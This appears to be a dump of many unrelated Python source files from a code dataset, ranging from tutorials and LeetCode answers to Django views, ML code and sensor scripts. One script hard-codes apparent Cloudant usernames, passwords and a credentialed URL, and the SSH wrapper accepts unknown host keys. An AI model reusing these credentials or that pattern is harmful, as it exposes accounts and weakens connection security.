print(thisdict)
print(len(thisdict))
thisdict = {
"brand": "Ford",
"electric": False,
"year": 1964,
"colors": ["red", "white", "blue"]
}
thisdict = {
"brand": "Ford",
"model": "Mustang",
"year": 1964
}
print(type(thisdict)) |
23,463 | 259bb3ef5230922a6cc574d4c811fcb7865674ed | import time
class Stopwatch:
    """Context manager that measures wall-clock time of the enclosed block.

    On exit it prints ``<message><elapsed> sec`` unless ``print_out`` is False.
    """
    def __init__(self, message='', print_out=True):
        self._message = message
        self._print_out = print_out
    def __enter__(self):
        self.start = time.time()
        # Bug fix: the original returned None, so `with Stopwatch() as sw`
        # bound sw to nothing.
        return self
    def __exit__(self, exc_type, exc_value, traceback):
        if self._print_out:
            print('{}{:.3f} sec'.format(self._message,
                                        time.time() - self.start))
|
23,464 | 88506ecc437924887452041332ecbf4eb78a9148 | import threading
import paramiko
import time
class SSH:
    """Paramiko SSH connection with a background thread that parses shell output.

    The daemon thread (process) accumulates output until a prompt ending in
    '$' appears, tokenises it and hands the tokens to parent.Process_Output().
    """
    shell = None
    client = None
    transport = None
    # Bug fix: the class attribute was misspelled 'parnent' and therefore
    # never matched the 'parent' attribute set in __init__.
    parent = None
    current_command = None

    def __init__(self, address, username, password, port, parent):
        print("Connecting to server on ip", str(address) + ".")
        self.parent = parent
        self.client = paramiko.client.SSHClient()
        self.client.set_missing_host_key_policy(paramiko.client.AutoAddPolicy())
        self.client.connect(address, username=username, password=password, look_for_keys=False)
        self.transport = paramiko.Transport((address, port))
        self.transport.connect(username=username, password=password)
        # Daemon reader thread: exits with the main program.
        thread = threading.Thread(target=self.process)
        thread.daemon = True
        thread.start()

    def closeConnection(self):
        """Close both the high-level client and the raw transport."""
        if self.client is not None:
            self.client.close()
            self.transport.close()

    def openShell(self):
        """Request an interactive shell channel on the existing connection."""
        self.shell = self.client.invoke_shell()

    def sendShell(self, command):
        """Send `command` to the shell, remembering its 'ls...' tail for the parser."""
        if self.shell:
            # The parser only cares about the command from 'ls' onward.
            self.current_command = command[command.find('ls'):]
            print(self.current_command)
            self.shell.send(command + "\n")
        else:
            print("Shell not opened.")

    def process(self):
        """Background loop: read, normalise and tokenise the shell output.

        NOTE(review): `global connection` refers to a name not defined in this
        module as shown — confirm it is needed.
        """
        global connection
        output = []
        should_return = False
        temp_str = ''
        while True:
            # Accumulate chunks until a '$'-terminated prompt token is seen.
            while should_return == False:
                if self.shell != None and self.shell.recv_ready():
                    alldata = self.shell.recv(1024)
                    while self.shell.recv_ready():
                        alldata += self.shell.recv(1024)
                        time.sleep(0.5)
                    # Strip the bytes-repr artifacts and normalise newlines.
                    strdata = str(alldata)
                    strdata = strdata.replace("b'", '')
                    strdata = strdata.replace("'", '')
                    strdata = strdata.replace('\\r', '')
                    strdata = strdata.replace('\\n', '\n')
                    strdata = strdata.replace('\r', '')
                    temp_str = temp_str + strdata
                    data = strdata.split(' ')
                    for dat in data:
                        if dat != '':
                            if dat.endswith("$"):
                                should_return = True
                            else:
                                pass
            if should_return:
                # Drop the echoed command line and the trailing prompt line.
                temp = temp_str.split('\n')
                print(temp)
                del(temp[0])
                del(temp[len(temp) - 1])
                if temp[0].startswith('ls: cannot access */'):
                    output = []
                else:
                    tot_string = ''
                    for item in temp:
                        tot_string = tot_string + ' ' + item
                    print(tot_string)
                    data = tot_string.split(' ')
                    output = []
                    for dat in data:
                        if dat != '':
                            dat = dat.replace('/', '')
                            output.append(dat)
                self.parent.Process_Output(self.current_command, output)
                should_return = False
                temp_str = ''
|
23,465 | 6fd489a5e1149647a6d10244acdc426e2edf3741 | from django.conf import settings
from django.contrib.auth import get_user_model
from django.contrib.sites.shortcuts import get_current_site
from django.core.signing import BadSignature, SignatureExpired, loads, dumps
from django.http import Http404, HttpResponseBadRequest
from django.shortcuts import redirect
from django.template.loader import get_template
from django.views.generic import CreateView, TemplateView
from users.forms import UsersRegistForm
from main.models import User
class UsersRegistView(CreateView):
    """Provisional (inactive) user registration."""
    template_name = 'users/regist.html'
    form_class = UsersRegistForm
    def form_valid(self, form):
        """Save the user as inactive and send the activation e-mail."""
        user = form.save(commit=False)
        user.is_active = False
        user.save()
        # Build and send the activation URL for the current site.
        current_site = get_current_site(self.request)
        domain = current_site.domain
        context = {
            'protocol': self.request.scheme,
            'domain': domain,
            'token': dumps(user.pk),  # signed token encoding the user's pk
            'user': user,
        }
        subject_template = get_template('users/mail_template/regist/subject.txt')
        subject = subject_template.render(context)
        message_template = get_template('users/mail_template/regist/message.txt')
        message = message_template.render(context)
        user.email_user(subject, message)
        return redirect('users:regist_done')
class UsersRegistDone(TemplateView):
    """Confirmation page shown after provisional registration."""
    template_name = 'users/regist_done.html'
class UsersRegistComplete(TemplateView):
    """Final registration (activation) when the e-mailed URL is visited."""
    template_name = 'users/regist_complete.html'
    timeout_seconds = getattr(settings, 'ACTIVATION_TIMEOUT_SECONDS', 60*60*24)  # default: within 1 day
    def get(self, request, **kwargs):
        """Activate the account if the signed token is valid and not expired."""
        token = kwargs.get('token')
        try:
            user_pk = loads(token, max_age=self.timeout_seconds)
        # Token expired
        except SignatureExpired:
            return HttpResponseBadRequest()
        # Token is invalid
        except BadSignature:
            return HttpResponseBadRequest()
        # Token is fine
        else:
            try:
                user = User.objects.get(pk=user_pk)
            except User.DoesNotExist:
                return HttpResponseBadRequest()
            else:
                if not user.is_active:
                    # All good: promote the provisional user to active.
                    user.is_active = True
                    user.save()
                    return super().get(request, **kwargs)
        return HttpResponseBadRequest()
23,466 | 65ec02cefef5790ae694f0399572c0b52a355726 | #!/bin/env python
# -*- coding: utf-8 -*-
# encoding=utf-8 vi:ts=4:sw=4:expandtab:ft=python
"""
test Conv2D_Transpose
"""
import pytest
import paddle
import numpy as np
from jitbase import Runner
from jitbase import randtool
class Conv2DTransposeNet(paddle.nn.Layer):
    """
    A Conv2DTranspose layer wrapper (4 -> 8 channels, 3x3 kernel, padding 1)
    whose forward pass is compiled with paddle.jit.to_static.
    """
    def __init__(self, dtype=np.float32):
        # Must be set before the layer is built so its weights use `dtype`.
        paddle.set_default_dtype(dtype)
        super(Conv2DTransposeNet, self).__init__()
        self._conv2d_t = paddle.nn.Conv2DTranspose(in_channels=4, out_channels=8, kernel_size=3, padding=1)
    @paddle.jit.to_static
    def forward(self, inputs):
        """
        Apply the transposed convolution to `inputs`.
        """
        return self._conv2d_t(inputs)
@pytest.mark.jit_Conv2D_Transpose_vartype
def test_jit_Conv2D_Transpose_base():
    """
    Smoke test for the jit.to_static Conv2DTranspose layer: runs the Runner
    over random float inputs of shape [2, 4, 224, 224] for float32/float64.
    """
    inps = randtool("float", -2, 2, shape=[2, 4, 224, 224])
    runner = Runner(func=Conv2DTransposeNet, name="Conv2D_Transpose_base", dtype=["float32", "float64"], ftype="layer")
    runner.add_kwargs_to_dict("params_group1", inputs=inps)
    runner.run()
|
23,467 | f7651f80953be8f31958eb83cc8d4a7689765364 | dmap = {}
def divisors(n):
 # Proper divisors of n (1 included, n itself excluded for n > 1), memoised
 # in the module-level dmap. Python 2 code (xrange, integer '/').
 # The recursive update is redundant but harmless: every divisor of a
 # divisor of n already divides n.
 if n == 1:
  return set([1])
 if n in dmap:
  return dmap[n]
 divs = set([])
 for x in xrange(1, n/2+1):
  if x in divs:
   continue
  if n % x == 0:
   divs.add(x)
   divs.update(divisors(x))
 dmap[n] = divs
 return divs
def is_abundant(n):
 # n is abundant when the sum of its proper divisors exceeds n.
 return sum(divisors(n)) > n
# Project Euler 23: every integer > 28123 is the sum of two abundant numbers,
# so collect the abundant numbers below that bound, strike out every pairwise
# sum, and total what remains. Python 2 (print statement).
abuns = []
for x in range(1, 28123):
 if is_abundant(x):
  abuns.append(x)
ns = set(range(1, 28123+1))
for x in abuns:
 for y in abuns:
  s = x + y
  if s in ns:
   ns.remove(s)
print sum(ns)
23,468 | 0668c00387aef23df52effb866e9617172fb5bae | # -*- coding: utf-8 -*-
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: base.proto
"""Generated protocol buffer code."""
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
# @@protoc_insertion_point(imports)
# Machine-generated descriptor wiring for base.proto (message ex.protos.Base
# with one bool field 'field'). Regenerate with protoc; do not hand-edit.
_sym_db = _symbol_database.Default()
DESCRIPTOR = _descriptor.FileDescriptor(
  name='base.proto',
  package='ex.protos',
  syntax='proto3',
  serialized_options=None,
  create_key=_descriptor._internal_create_key,
  serialized_pb=b'\n\nbase.proto\x12\tex.protos\"\x15\n\x04\x42\x61se\x12\r\n\x05\x66ield\x18\x01 \x01(\x08\x62\x06proto3'
)
_BASE = _descriptor.Descriptor(
  name='Base',
  full_name='ex.protos.Base',
  filename=None,
  file=DESCRIPTOR,
  containing_type=None,
  create_key=_descriptor._internal_create_key,
  fields=[
    _descriptor.FieldDescriptor(
      name='field', full_name='ex.protos.Base.field', index=0,
      number=1, type=8, cpp_type=7, label=1,
      has_default_value=False, default_value=False,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
  ],
  extensions=[
  ],
  nested_types=[],
  enum_types=[
  ],
  serialized_options=None,
  is_extendable=False,
  syntax='proto3',
  extension_ranges=[],
  oneofs=[
  ],
  serialized_start=25,
  serialized_end=46,
)
DESCRIPTOR.message_types_by_name['Base'] = _BASE
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
Base = _reflection.GeneratedProtocolMessageType('Base', (_message.Message,), {
  'DESCRIPTOR' : _BASE,
  '__module__' : 'base_pb2'
  # @@protoc_insertion_point(class_scope:ex.protos.Base)
  })
_sym_db.RegisterMessage(Base)
# @@protoc_insertion_point(module_scope)
|
23,469 | 40b1d5622767188ef98042cf815ed71ccba90db5 | import copy
import numpy as np
import torch
import torch.nn as nn
import torch.nn.functional as F
import time
class Identity(nn.Module):
    """Pass-through layer: forward(x) returns x unchanged; constructor
    arguments are accepted and ignored so it can stand in for any activation.
    """
    def __init__(self, *args, **kwargs):
        super().__init__()
    def forward(self, x):
        return x
# Lookup table from genome config strings to activation modules.
# NOTE(review): these module instances are shared by every network built from
# this table; harmless for stateless activations, but confirm before adding
# stateful ones.
string_to_activation = {
    'identity': Identity(),
    'leaky_relu': nn.LeakyReLU(),
    'relu': nn.ReLU(),
    'sigmoid': nn.Sigmoid(),
    'tanh': nn.Tanh(),
    'elu': nn.ELU()
}
class NeuralNetwork_Deep(nn.Module):
    """MLP built from a genome's node list; weights/biases are carried in the
    genome and zero-padded/cropped to fit each layer's current size.

    Node list convention (from create_network): index 0 is the input layer,
    index 1 the output layer, indices >= 2 the hidden layers in order.
    """
    def __init__(self, device):
        super(NeuralNetwork_Deep, self).__init__()
        self.device = device
        # NOTE(review): `self.modules` shadows nn.Module.modules(); a rename
        # (e.g. self._module_list) would be safer if no external code reads it.
        self.modules = []
        self.model = None
    def forward(self, x):
        # Delegate to the nn.Sequential assembled by create_network().
        return self.model(x)
    def apply_weights(self, node):
        """Copy the node's stored weights into the most recent Linear layer,
        zero-padding the stored matrix up to the layer's shape first and then
        cropping to exactly (rows, cols)."""
        if node['weights'] is None:
            # First use: capture the layer's freshly initialised weights.
            node['weights'] = self.modules[-1].weight.data
        else:
            rows = self.modules[-1].weight.data.size(0)
            cols = self.modules[-1].weight.data.size(1)
            # Add row if necessary
            difference = self.modules[-1].weight.data.size(0) - node['weights'].size(0)
            if difference > 0:
                node['weights'] = torch.cat((node['weights'], torch.zeros(difference, node['weights'].size(1), device=self.device)), 0)
            # Add column if necessary
            difference = self.modules[-1].weight.data.size(1) - node['weights'].size(1)
            if difference > 0:
                node['weights'] = torch.cat((node['weights'], torch.zeros(node['weights'].size(0), difference, device=self.device)), 1)
            self.modules[-1].weight.data = node['weights'][:rows, :cols]
    def apply_bias(self, node):
        """Same as apply_weights, for the 1-D bias vector."""
        if node['biases'] is None:
            node['biases'] = self.modules[-1].bias.data
        else:
            cols = self.modules[-1].bias.data.size(0)
            difference = self.modules[-1].bias.data.size(0) - node['biases'].size(0)
            if difference > 0:
                node['biases'] = torch.cat((node['biases'], torch.zeros(difference, device=self.device)), 0)
            self.modules[-1].bias.data = node['biases'][:cols]
    def create_genome_from_network(self):
        """Write the trained layer weights/biases back into self.nodes.

        Layers alternate Linear/activation, so hidden Linear layers sit at
        even indices; the output layer is the second-to-last module.
        """
        for layer in range(0, len(self.model) - 2, 2):
            self.nodes[int(layer/2) + 2]['weights'] = self.model[layer].weight.data
            self.nodes[int(layer/2) + 2]['biases'] = self.model[layer].bias.data
        self.nodes[1]['weights'] = self.model[-2].weight.data
        self.nodes[1]['biases'] = self.model[-2].bias.data
        return self.nodes
    def create_network(self, genome):
        """Assemble nn.Sequential from the genome's nodes (hidden layers from
        index 2 onward, then the fixed output layer at index 1)."""
        # Extract sequence and nodes
        self.nodes = genome.nodes
        # Keep track of the size of the previous layer
        previous_input_size = self.nodes[0]['num_nodes']
        # 0 and 1 are reserved for the input and output layer and are fixed
        for i in range(2, len(self.nodes)):
            self.modules.append(nn.Linear(previous_input_size, self.nodes[i]['num_nodes']))
            self.apply_weights(self.nodes[i])
            self.apply_bias(self.nodes[i])
            self.modules.append(string_to_activation[self.nodes[i]['activation_function']])
            previous_input_size = self.nodes[i]['num_nodes']
        self.modules.append(nn.Linear(previous_input_size, self.nodes[1]['num_nodes']))
        self.apply_weights(self.nodes[1])
        self.apply_bias(self.nodes[1])
        self.modules.append(string_to_activation[self.nodes[1]['activation_function']])
        self.model = nn.Sequential(*self.modules)
    def act(self, state, epsilon, mask, device):
        """Epsilon-greedy action: masked argmax of Q-values, else random.

        NOTE(review): self.num_actions is never assigned in this class as
        shown — confirm it is set elsewhere before the random branch runs.
        """
        if np.random.rand() > epsilon:
            state = torch.tensor([state], dtype=torch.float32, device=device)
            mask = torch.tensor([mask], dtype=torch.float32, device=device)
            q_values = self.forward(state) + mask
            action = q_values.max(1)[1].view(1, 1).item()
        else:
            action = np.random.randint(self.num_actions)
        return action
|
23,470 | 263202d776b434d29c6370c521af6afc7afe5db4 | class Solution:
def maxProfit(self, prices) -> int:
days = len(prices)
if not prices:
return 0
profit = 0
for i in range(1, days):
diff = prices[i] - prices[i-1]
if diff > 0:
profit+= diff
return profit
if __name__ == '__main__':
    # Quick sanity checks: expected outputs 4 and 25.
    print(Solution().maxProfit([1,2,3,4,5]))
    print(Solution().maxProfit([1,9,6,9,1,7,1,1,5,9,9,9]))
|
23,471 | 0330c14241bfccd1864366288b767165e78b3bb9 | """ This script loads the deep guidance data logged from an experiment (specifically, logged by use_deep_guidance_arm.py)
renders a few plots, and animates the motion.
It should be run from the folder where use_deep_guidance_arm.py was run from for the given experiment.
"""
import numpy as np
import glob
import os
import matplotlib.pyplot as plt
from pyvirtualdisplay import Display # for rendering
# import code # for debugging
#code.interact(local=dict(globals(), **locals())) # Ctrl+D or Ctrl+Z to continue execution
# The settings module must configure the 'manipulator' environment; bail out
# with a clear message otherwise. NOTE(review): the bare `except:` also
# swallows KeyboardInterrupt/SystemExit during import.
try:
    from settings import Settings
except:
    print("\nYou must use the manipulator environment in settings.py\n\nQuitting")
    raise SystemExit
assert Settings.ENVIRONMENT == 'manipulator'
environment_file = __import__('environment_' + Settings.ENVIRONMENT) # importing the environment
def make_C_bI(angle):
    """Rotation matrix from the inertial frame to the body frame (2-D).

    Returns the 2x2 direction-cosine matrix for a rotation by ``angle``
    (radians).
    """
    cos_a = np.cos(angle)
    sin_a = np.sin(angle)
    return np.array([[cos_a, sin_a],
                     [-sin_a, cos_a]])  # [2, 2]
# Generate a virtual display for plotting
display = Display(visible = False, size = (1400,900))
display.start()
#####################################
### Load in the experimental data ###
#####################################
# NOTE(review): the glob pattern is hard-coded to a single experiment's
# timestamp suffix; np.load also expects NumPy binary content despite the
# .txt extension -- confirm how use_deep_guidance_arm.py wrote this log.
log_filename = glob.glob('*46-55.txt')[0]
data = np.load(log_filename)
print("Data file %s is loaded" %log_filename)
# All figures are written into a directory named after the log file.
os.makedirs(log_filename.split('.')[0], exist_ok=True)
########################
### Plot some things ###
########################
# Column layout: 0 = time, 1-2 = commanded linear accelerations,
# 3 = base angular acceleration, 4-6 = arm joint angular accelerations.
time_log = data[:,0]
deep_guidances_ax = data[:,1]
deep_guidances_ay = data[:,2]
deep_guidances_alpha = data[:,3]
deep_guidances_shoulder = data[:,4]
deep_guidances_elbow = data[:,5]
deep_guidances_wrist = data[:,6]
plt.figure()
plt.plot(time_log, deep_guidances_ax)
plt.plot(time_log, deep_guidances_ay)
plt.savefig(log_filename.split('.')[0] + "/Acceleration Commands.png")
print("Saved acceleration commands figure")
plt.figure()
plt.plot(time_log, deep_guidances_alpha)
plt.savefig(log_filename.split('.')[0] + "/Angular Acceleration commands.png")
print("Saved angular acceleration commands figure")
plt.figure()
plt.plot(time_log, deep_guidances_shoulder)
plt.plot(time_log, deep_guidances_elbow)
plt.plot(time_log, deep_guidances_wrist)
plt.savefig(log_filename.split('.')[0] + "/Arm Acceleration commands.png")
print("Saved arm angular acceleration commands figure")
##########################
### Animate the motion ###
##########################
# Generate an Environment to use for reward logging
environment = environment_file.Environment()
environment.reset(False)
# Process the data. Need to make the raw total state log
# [relative_x, relative_y, relative_vx, relative_vy,
#relative_angle, relative_angular_velocity, chaser_x, chaser_y, chaser_theta,
#target_x, target_y, target_theta, chaser_vx, chaser_vy, chaser_omega,
#target_vx, target_vy, target_omega] *# Relative pose expressed in the chaser's body frame; everything else in Inertial frame #*
print("Rendering animation...", end='')
raw_total_state_log = []
cumulative_reward_log = []
action_log = []
cumulative_rewards = 0
SPOTNet_previous_relative_x = 0.0
are_we_done = False
timestep_where_docking_occurred = -1
# Replay each logged timestep through the environment so rewards,
# collisions, and docking are recomputed from the recorded states.
for i in range(len(data)):
    Pi_time, deep_guidance_Ax, deep_guidance_Ay, deep_guidance_alpha_base, \
    deep_guidance_alpha_shoulder, deep_guidance_alpha_elbow, deep_guidance_alpha_wrist, \
    Pi_red_x, Pi_red_y, Pi_red_theta, \
    Pi_red_Vx, Pi_red_Vy, Pi_red_omega, \
    Pi_black_x, Pi_black_y, Pi_black_theta, \
    Pi_black_Vx, Pi_black_Vy, Pi_black_omega, \
    shoulder_theta, elbow_theta, wrist_theta, \
    shoulder_omega, elbow_omega, wrist_omega, docked = data[i,:]
    # Raw total state log
    # [self.chaser_position, self.chaser_velocity, self.arm_angles, self.arm_angular_rates, self.target_position, self.target_velocity, self.end_effector_position, self.end_effector_velocity, self.relative_position_body, self.relative_angle, self.end_effector_position_body, self.end_effector_velocity_body]
    # Trailing zeros fill the derived-quantity slots the renderer recomputes.
    raw_total_state_log.append([Pi_red_x, Pi_red_y, Pi_red_theta, Pi_red_Vx, Pi_red_Vy, Pi_red_omega, shoulder_theta, elbow_theta, wrist_theta, shoulder_omega, elbow_omega, wrist_omega, Pi_black_x, Pi_black_y, Pi_black_theta, Pi_black_Vx, Pi_black_Vy, Pi_black_omega, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0])
    # Check the reward function based off this state
    environment.chaser_position = np.array([Pi_red_x, Pi_red_y, Pi_red_theta])
    environment.chaser_velocity = np.array([Pi_red_Vx, Pi_red_Vy, Pi_red_omega])
    environment.target_position = np.array([Pi_black_x, Pi_black_y, Pi_black_theta])
    environment.target_velocity = np.array([Pi_black_Vx, Pi_black_Vy, Pi_black_omega])
    environment.arm_angles = np.array([shoulder_theta, elbow_theta, wrist_theta])
    environment.arm_angular_rates = np.array([shoulder_omega, elbow_omega, wrist_omega])
    # Get environment to check for collisions
    environment.update_end_effector_and_docking_locations()
    environment.update_end_effector_location_body_frame()
    environment.update_relative_pose_body_frame()
    environment.check_collisions()
    rewards_this_timestep = environment.reward_function(0)
    # Only add rewards if we aren't done
    if not are_we_done:
        cumulative_rewards += rewards_this_timestep
        if environment.is_done(): # If we are done, this was the last reward that we added
            are_we_done = True
            timestep_where_docking_occurred = i
    cumulative_reward_log.append(cumulative_rewards)
    action_log.append([deep_guidance_Ax, deep_guidance_Ay, deep_guidance_alpha_base, deep_guidance_alpha_shoulder, deep_guidance_alpha_elbow, deep_guidance_alpha_wrist])
# Render the episode
environment_file.render(np.asarray(raw_total_state_log), np.asarray(action_log), 0, np.asarray(cumulative_reward_log), 0, 0, 0, 0, 0, 1, log_filename.split('.')[0], '', time_log, timestep_where_docking_occurred)
print("Done!")
# Close the display
del environment
plt.close()
display.stop()
23,472 | b7dc32f27f839a7f9ac537370bccdb49137f9258 | # Definition for singly-linked list.
# class ListNode(object):
# def __init__(self, x):
# self.val = x
# self.next = None
class Solution(object):
    def detectCycle(self, head):
        """
        Return the node where a cycle begins, or None if there is no cycle.

        Uses Floyd's tortoise-and-hare: once the fast and slow pointers
        meet inside the cycle, restarting a pointer from the head and
        advancing both one step at a time makes them meet again exactly
        at the cycle's entry node.

        :type head: ListNode
        :rtype: ListNode
        """
        try:
            # Phase 1: slow moves one step per iteration, fast moves two.
            slow = head.next
            fast = head.next.next
            while not slow == fast:
                slow = slow.next
                fast = fast.next.next
            # Phase 2: restart from head; advance both pointers one step
            # at a time -- their meeting point is the cycle entry.
            probe = head
            while not probe == fast:
                fast = fast.next
                probe = probe.next
            return probe
        except AttributeError:
            # Bug fix: was a bare `except:` (also swallowed KeyboardInterrupt
            # etc.). Walking off the list end (None.next) means no cycle.
            return None
|
23,473 | 3d28c8dca08b31273ea8a0cc942a79fc80e58640 |
# Example month number to convert (1-12).
user = 8

def getMonthName(user):
    """Return the English name for month number *user* (1-12).

    Returns None for numbers outside 1-12, matching the original
    lookup-miss behaviour.
    """
    months = ['January', 'February', 'March', 'April',
              'May', 'June', 'July', 'August',
              'September', 'October', 'November', 'December']
    # Direct O(1) index instead of scanning a list of [number, name] pairs.
    if 1 <= user <= len(months):
        return months[user - 1]
    return None

res = getMonthName(user)
print(res)
23,474 | 3cdc17fb082de0378475442b6ebeae9bcdfe3cd2 | from setuptools import setup, find_packages
setup(
name='aquacrop_fd',
version='0.3.5',
description='AquaCrop wrapper',
url='https://github.com/DHI-GRAS/aquacrop-fd',
author='Jonas Solvsteen',
author_email='josl@dhigroup.com',
entry_points="""
[console_scripts]
aquacrop-run=aquacrop_fd.scripts.cli:run_cli
aquacrop-queues=aquacrop_fd.scripts.cli:run_queues
""",
install_requires=[
'numpy',
'xarray',
'rasterio',
'pandas',
'affine',
'click',
'scipy',
'dask',
'netcdf4',
'python-dateutil',
'marshmallow==3.0.0rc1',
'requests'
],
extras_require={
'test': [
'pytest',
'pytest-cov',
'codecov',
'colorlog'
]
},
packages=find_packages(),
include_package_data=True
)
|
23,475 | bf332d4d5b38774d2b52c721d02d003ca0cfc815 | """
Press Ctrl+C to quit.
2017-02-02 13:45:25.233400
Sensor - F4:A5:74:89:16:57
Temperature: 10
Humidity: 28
Pressure: 689
"""
# RuuviTag Libraries
import os
from datetime import datetime
from ruuvitag_sensor.ruuvi import RuuviTagSensor
# Cloudant Libraries
from cloudant.client import Cloudant
from cloudant.error import CloudantException
from cloudant.result import Result, ResultByKey
# Sleep
from time import sleep
# Cloudant Credentials
# NOTE(review): credentials are hard-coded in source -- move them to
# environment variables or a config file and rotate these values.
serviceUsername = "25656ee7-7379-47cd-9ba0-7180a1a2495e-bluemix"
servicePassword = "ea29328064d8eae35cb8b1adc153c9e284f4de9422ddba89a1014a60f5dabe67"
serviceURL = "https://25656ee7-7379-47cd-9ba0-7180a1a2495e-bluemix:ea29328064d8eae35cb8b1adc153c9e284f4de9422ddba89a1014a60f5dabe67@25656ee7-7379-47cd-9ba0-7180a1a2495e-bluemix.cloudantnosqldb.appdomain.cloud"
# MAC address of the RuuviTag beacon to listen for.
mac = 'F7:36:31:B2:5F:F9'
# RuuviTag global variables holding the last formatted reading lines.
line_sen = ""
line_tem = ""
line_hum = ""
line_pre = ""
# Cloudant database name.
databaseName = "dbRuuviTag"
# RuuviTag begins to scan.
print('Starting')
def print_data(received_data):
    """Callback for RuuviTagSensor.get_datas: print one reading and store it.

    ``received_data`` is a (mac, sensor_dict) tuple. The reading is printed
    to the console, written to Cloudant as a JSON document, read back for
    verification, and then the client disconnects and the process exits
    (the demo intentionally handles a single reading).
    """
    sleep(1)  # bug fix: was Sleep(1); `from time import sleep` is lowercase
    received_mac = received_data[0]
    data = received_data[1]
    # Save Data in variables
    line_sen = str.format('Sensor - {0}', received_mac)
    line_tem = str.format('Temperature: {0} C', data['temperature'])
    line_hum = str.format('Humidity: {0}', data['humidity'])
    line_pre = str.format('Pressure: {0}', data['pressure'])
    # Clear screen and print sensor data
    os.system('clear')
    print('Press Ctrl+C to quit.\n\r')
    print('Team Bravers \n\r\n\r')
    print(str(datetime.now()))
    print(line_sen)
    print(line_tem)
    print(line_hum)
    print(line_pre)
    print('\n\r\n\r.......')
    # Store the reading as a document in the database.
    sensor = received_mac
    temperature = data['temperature']
    humidity = data['humidity']
    pressure = data['pressure']  # bug fix: was document['pressure'] (undefined name)
    # Build a JSON document representing the reading.
    jsonDocument = {
        "sensorMac": sensor,
        "temp": temperature,
        "hum": humidity,
        "press": pressure
    }
    print(jsonDocument)
    # Create the document (bug fix: 'myDBeacon' was never defined; the
    # database handle created at module level is 'dbRuuviTag').
    newDocument = dbRuuviTag.create_document(jsonDocument)
    # Verify the document now exists in the database.
    if newDocument.exists():
        # bug fix: print(...).format(...) raised AttributeError on None and
        # 'number' was undefined -- report the new document id instead.
        print("Document '{0}' successfully created.".format(newDocument['_id']))
    # Separate the results.
    print("----\n")
    # Minimal retrieval of the first document in the database.
    result_collection = Result(dbRuuviTag.all_docs)
    print("Retrieved minimal document:\n{0}\n".format(result_collection[0]))
    # Full retrieval (including content) of the first document.
    result_collection = Result(dbRuuviTag.all_docs, include_docs=True)
    print("Retrieved full document:\n{0}\n".format(result_collection[0]))
    # Separate the results.
    print("----\n")
    # Use the raw Cloudant HTTP endpoint to fetch every document with
    # its content.
    end_point = '{0}/{1}'.format(serviceURL, databaseName + "/_all_docs")
    params = {'include_docs': 'true'}
    # Issue the request and show the response body.
    response = client.r_session.get(end_point, params=params)
    print("{0}\n".format(response.json()))
    # Separate the results.
    print("----\n")
    # All done -- disconnect from the server and stop after this reading.
    client.disconnect()
    print("===\n")
    exit()
# Use the IBM library to create an IBM Cloudant client.
client = Cloudant(serviceUsername, servicePassword, url=serviceURL)
# Connect with the server.
client.connect()
# Create a DB instance (returns the existing one if already present).
dbRuuviTag = client.create_database(databaseName)
# Verify the database exists.
if dbRuuviTag.exists():
    print ("'{0}' successfully create.\n".format(databaseName))
    # Split Results.
    print ("----\n")
# Start scanning; print_data is invoked for each reading from the beacon.
RuuviTagSensor.get_datas(print_data, mac)
|
23,476 | bdf30f784e5f22860ef2b52a649508528b0d5a53 | from codecs import open
from os import path
import os
from setuptools import Extension, find_packages, setup
from sys import version_info
def file_content(fpath):
    """Return the UTF-8 text of *fpath*, resolved relative to this setup.py."""
    full_path = path.join(here, fpath)
    with open(full_path, encoding='utf-8') as handle:
        return handle.read()
here = path.abspath(path.dirname(__file__))
# if WINDOWS
if os.name == 'nt':
    import numpy
    # NOTE(review): Boost paths are hard-coded to a local D:\ build tree;
    # builds on other machines need these adjusted.
    BOOST_LIBS = r'D:\boost_1_66_0_src\stage\lib'
    BOOST_ROOT = r'D:\boost_1_66_0_src'
    # there is need to copy the libboost_python3-vc141-mt-x64-1_66 file into boost_python3-vc141-mt-x64-1_66 file
    lib_boost_py = BOOST_LIBS+r'\libboost_python3-vc141-mt-x64-1_66'
    lib_boost_chrono = BOOST_LIBS+r'\libboost_chrono-vc141-mt-x64-1_66'
    lib_boost_system = BOOST_LIBS+r'\libboost_system-vc141-mt-x64-1_66'
    lib_boost_thread = BOOST_LIBS+r'\libboost_thread-vc141-mt-x64-1_66'
    lib_other_boost_py = BOOST_LIBS+r'\boost_python3-vc141-mt-x64-1_66'
    libraries = [lib_boost_py, lib_boost_chrono, lib_boost_system, lib_boost_thread, lib_other_boost_py]
    include_dirs = ['include', numpy.get_include(), BOOST_ROOT]
else:
    # if LINUX
    # The Boost.Python library name encodes the interpreter version (e.g. py36).
    lib_boost_py = 'boost_python-py%i%i' % version_info[:2]
    lib_boost_chrono = 'boost_chrono'
    lib_boost_system = 'boost_system'
    lib_boost_thread = 'boost_thread'
    libraries = [lib_boost_py, lib_boost_chrono, lib_boost_system, lib_boost_thread]
    include_dirs = ['include']
setup(
    name='voxel_map',
    version='0.0.1',
    description='Simple C++ header-only library with Matlab and Python interfaces for dealing with voxel maps.',
    long_description=file_content('README.md'),
    url='https://bitbucket.org/tpetricek/voxel_map',
    author='Tomas Petricek',
    author_email='tpetricek@gmail.com',
    license='MIT',
    # See https://pypi.python.org/pypi?%3Aaction=list_classifiers
    classifiers=[
        'Development Status :: 3 - Alpha',
        'Intended Audience :: Developers',
        'Intended Audience :: Information Technology',
        'Intended Audience :: Science/Research',
        'Topic :: Software Development :: Build Tools',
        'Topic :: Multimedia :: Graphics :: 3D Modeling',
        'Topic :: Multimedia :: Graphics :: 3D Rendering',
        'License :: OSI Approved :: MIT License',
        'Programming Language :: Python :: 2',
        'Programming Language :: Python :: 2.7',
        'Programming Language :: Python :: 3',
        'Programming Language :: Python :: 3.5',
        'Programming Language :: Python :: 3.6',
        'Programming Language :: Python :: 3.7',
    ],
    keywords='voxel map volumetric data',
    packages=find_packages(),
    install_requires=['numpy'],
    # C++ extension module; requires Boost.Python and OpenMP at build time.
    ext_modules=[
        Extension(
            name='voxel_map',
            sources=['python/voxel_map_module.cpp'],
            include_dirs=include_dirs,
            libraries=libraries,
            extra_compile_args=['-fopenmp'],
            extra_link_args=['-lgomp']
        )
    ]
)
|
